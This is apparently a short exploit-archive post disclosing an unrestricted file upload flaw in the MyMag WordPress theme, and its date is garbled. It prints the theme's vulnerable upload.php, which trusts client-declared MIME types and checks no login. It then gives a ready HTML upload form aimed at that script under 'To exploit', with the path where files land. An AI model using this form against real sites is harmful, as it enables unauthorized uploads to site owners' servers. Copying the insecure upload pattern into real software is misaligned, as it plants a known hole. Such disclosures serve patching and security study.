Home / os / solaris

MyMag wordpress theme Unrestricted File Upload

Posted on 30 November -0001

<HTML><HEAD><TITLE>MyMag wordpress theme Unrestricted File Upload</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>upload.php: Code : $dir = "images/logos/"; $url = $_POST['url']; if (is_writable($dir)) { if ((($_FILES["file"]["type"] == "image/gif") || ($_FILES["file"]["type"] == "image/jpeg") || ($_FILES["file"]["type"] == "image/png") || ($_FILES["file"]["type"] == "image/pjpeg")) && ($_FILES["file"]["size"] < 1048576)) { if ($_FILES["file"]["error"] > 0){ echo "Return Code: " . $_FILES["file"]["error"] . "<br />"; } else { $_FILES["file"]["name"] = str_replace(' ', '_' , $_FILES["file"]["name"]); if (file_exists($dir . $_FILES["file"]["name"])) { echo $_FILES["file"]["name"] . " already exists. "; } else { switch($_FILES["file"]["type"]) { case "image/jpeg" : $end = ".jpg"; break; case "image/png" : $end = ".png"; break; case "image/gif" : $end = ".gif"; break; } $newname = time().$end; move_uploaded_file($_FILES["file"]["tmp_name"], $dir . $newname); $file = $newname; $admin = "/wp-admin/themes.php?page=functions.php&pic="; header("Location: $url$admin$file"); Page : /wp-content/themes/mymag/upload.php To exploit : <html> <body> <form action="http://localhost/wp-content/themes/mymag/upload.php" method="post" enctype="multipart/form-data"> <label for="file">Filename:</label> <input type="file" name="file" id="file"><br> <input type="submit" name="submit" value="Submit"> </form> </body> </html> Upload the file to the form and submit the form.The file will be uploaded to http://localhost/wp-content/themes/mymag/images/logos </BODY></HTML>

 

TOP